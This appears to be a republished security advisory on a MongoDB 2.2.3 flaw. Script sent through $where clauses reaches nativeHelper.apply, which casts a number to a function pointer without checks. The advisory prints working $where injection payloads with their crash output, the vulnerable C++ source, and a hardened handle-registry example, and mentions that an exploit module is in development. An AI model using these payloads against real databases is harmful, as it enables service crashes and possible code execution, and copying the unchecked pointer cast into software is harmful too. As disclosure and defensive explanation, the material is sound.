JavaScript injection on the MongoDB server (officially fixed)

Source: Internet
Author: User

Security researcher Agix found a vulnerability in MongoDB 2.2.3 and stated that a Metasploit exploit payload is under development. The vulnerability is caused by incorrect use of the nativeHelper function of the SpiderMonkey JavaScript engine embedded in MongoDB, which allows injected code or a buffer overflow to execute arbitrary code.
What follows is the analysis provided by the researcher.
First, try some server-side JavaScript injection in MongoDB to run a shell command. In the mongo shell, run() works locally:
> run("uname", "-a")
Sun Mar 25 07:09:49 shell: started program
sh1838| Linux mongo 2.6.32-5-686 #1 SMP Sun Sep 23 09:49:36 UTC 2012 i686 GNU/Linux
0
The run() function, however, exists only in the mongo shell client; sent to the server inside a $where clause it is undefined:
> db.my_collection.find({$where: "run('ls')"})
error: {
    "$err" : "error on invocation of $where function: \nJS Error: ReferenceError: run is not defined nofile_a:0",
    "code" : 10071
}
The researcher digs deeper and looks at what run actually is:
> run
function () {
    return nativeHelper.apply(run_, arguments);
}
The run function is only a wrapper around nativeHelper.apply, so the next attempt calls nativeHelper.apply(run_, ["uname", "-a"]) directly on the server. The error now complains about run_, not about nativeHelper, which shows that the nativeHelper.apply method exists on the server side.
> db.my_collection.find({$where: 'nativeHelper.apply(run_, ["uname", "-a"]);'})
error: {
    "$err" : "error on invocation of $where function: \nJS Error: ReferenceError: run_ is not defined nofile_a:0",
    "code" : 10071
}
Next, an associative array (an object with a numeric member x) is passed to the server in place of run_:
> db.my_collection.find({$where: 'nativeHelper.apply({"x": 135246144}, ["uname", "-a"]);'})
Sun Mar 25 07:15:26 DBClientCursor::init call() failed
Sun Mar 25 07:15:26 query failed: sthack.my_collection {$where: "nativeHelper.apply({"x": 135246144}, ["uname", "-a"]);"} to: 127.0.0.1:27017
Error: error doing query: failed
Sun Mar 25 07:15:26 trying reconnect to 127.0.0.1:27017
Sun Mar 25 07:15:26 reconnect 127.0.0.1:27017 failed couldn't connect to server 127.0.0.1:27017
The result: the server crashed \o/!
Check the source code, path: ./src/mongo/scripting/engine_spidermonkey.cpp
JSBool native_helper( JSContext *cx , JSObject *obj , uintN argc, jsval *argv , jsval *rval ) {
    try {
        Convertor c(cx);

        // the numeric "x" and "y" members of the script-supplied object are
        // cast straight to a function pointer and a data pointer
        NativeFunction func = reinterpret_cast<NativeFunction>(
                static_cast<long long>( c.getNumber( obj , "x" ) ) );
        void* data = reinterpret_cast<void*>(
                static_cast<long long>( c.getNumber( obj , "y" ) ) );
        verify( func );

        BSONObj a;
        if ( argc > 0 ) {
            BSONObjBuilder args;
            for ( uintN i = 0; i < argc; ++i ) {
                c.append( args , args.numStr( i ) , argv[i] );
            }
            a = args.obj();
        }

        BSONObj out;
        try {
            out = func( a, data );  // the script-controlled pointer is called here
        }
        catch ( std::exception& e ) {
The value of the x member of the JavaScript object (135246144 above) is converted directly into a function pointer and called, without any check that it points to a real native function.
> db.my_collection.find({$where: 'nativeHelper.apply({"x": 0x31337}, ["uname", "-a"]);'})

Sun Mar 25 07:20:03 Invalid access at address: 0x31337 from thread: conn1
Sun Mar 25 07:20:03 Got signal: 11 (Segmentation fault).
MongoDB has released the latest version, 2.4.1, to fix this vulnerability.
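As an added example (not MongoDB's code, and not the fix that shipped in 2.4.1), the cast-and-call pattern from native_helper is shown beside a handle-based alternative. It uses simplified stand-ins for NativeFunction and BSONObj: script code only ever holds an opaque handle, and the native pointer is looked up in a table that script code cannot write.

```cpp
// Added example (not MongoDB's code): the page's native_helper turns the
// script-supplied number "x" straight into a function pointer; the same
// pattern is shown next to a registry that never lets script pick an address.
#include <cmath>
#include <map>
#include <string>
#include <vector>
// Stand-in for MongoDB's NativeFunction: a vector of strings plays the
// role of the BSONObj argument list, plus an opaque data pointer.
using NativeFunction = std::string (*)(const std::vector<std::string>&, void*);

// Hypothetical native, like run_ on the page, that only echoes its arguments.
std::string echo_native(const std::vector<std::string>& args, void*) {
    std::string out;
    for (const auto& a : args) out += a + " ";
    return out;
}

// Vulnerable pattern (mirrors native_helper): whatever number the script put
// in "x" is called as a function. On the page, x = 0x31337 ends in SIGSEGV.
std::string call_unchecked(double x, const std::vector<std::string>& args) {
    NativeFunction func = reinterpret_cast<NativeFunction>(static_cast<long long>(x));
    return func(args, nullptr);  // attacker-chosen address, no validation
}

// Hardened pattern: script only ever holds an opaque handle; the pointers
// live in a table script code cannot write, and bad handles are refused.
class NativeRegistry {
public:
    int add(NativeFunction fn) { table_[next_] = fn; return next_++; }
    // False for anything that is not an integer in [1, next_): 0x31337, -1,
    // 1.5 and NaN are all rejected before any cast or lookup takes place.
    bool call(double handle, const std::vector<std::string>& args, std::string& out) const {
        if (!(handle >= 1.0 && handle < static_cast<double>(next_))) return false;
        if (std::floor(handle) != handle) return false;
        auto it = table_.find(static_cast<int>(handle));
        if (it == table_.end()) return false;
        out = it->second(args, nullptr);
        return true;
    }
private:
    std::map<int, NativeFunction> table_;
    int next_ = 1;
};

// Convenience wrapper: an empty string means the registry refused the handle.
std::string safe_call(const NativeRegistry& reg, double handle, const std::vector<std::string>& args) {
    std::string out;
    return reg.call(handle, args, out) ? out : "";
}
```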